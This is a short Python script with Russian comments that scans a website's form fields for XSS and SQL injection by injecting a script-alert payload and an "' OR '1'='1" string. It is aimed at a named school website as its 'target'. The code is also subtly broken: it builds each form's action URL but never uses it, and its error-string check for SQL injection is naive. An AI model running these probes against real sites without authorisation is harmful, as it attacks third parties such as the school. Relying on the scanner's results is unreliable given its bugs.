123132213

1. import requests
2. from bs4 import BeautifulSoup
3.  
4. # Функция для проверки XSS уязвимости
5. def check_xss(url, param):
6.     payload = "<script>alert('XSS')</script>"
7.     response = requests.get(url, params={param: payload})
8.     print(response.content)
9.     if payload in response.text:
10.         return True
11.     return False
12.  
13. # Функция для проверки SQL-инъекции
14. def check_sql_injection(url, param):
15.     payload = "' OR '1'='1"
16.     response = requests.get(url, params={param: payload})
17.     print(response.content)
18.     if "error" in response.text.lower():
19.         return True
20.     return False
21.  
22. # Основная функция для проверки уязвимостей
23. def check_vulnerabilities(url):
24.     try:
25.         response = requests.get(url)
26.         soup = BeautifulSoup(response.text, 'html.parser')
27.  
28.         # Извлечение всех форм
29.         forms = soup.find_all('form')
30.         for form in forms:
31.             action = form.get('action')
32.             if not action.startswith('http'):
33.                 action = url + action
34.             inputs = form.find_all('input')
35.             for input_tag in inputs:
36.                 input_name = input_tag.get('name')
37.                 if input_name:
38.                     # Проверка на XSS
39.                     if check_xss(url, input_name):
40.                         print(f"XSS уязвимость найдена в параметре: {input_name}")
41.  
42.                     # Проверка на SQL-инъекцию
43.                     if check_sql_injection(url, input_name):
44.                         print(f"SQL-инъекция найдена в параметре: {input_name}")
45.  
46.     except Exception as e:
47.         print(f"Ошибка: {e}")
48.  
49. # Пример использования
50. if __name__ == "__main__":
51.     target_url = "https://школа12саров.рф/"  # Замените на URL целевого веб-сайта
52.     check_vulnerabilities(target_url)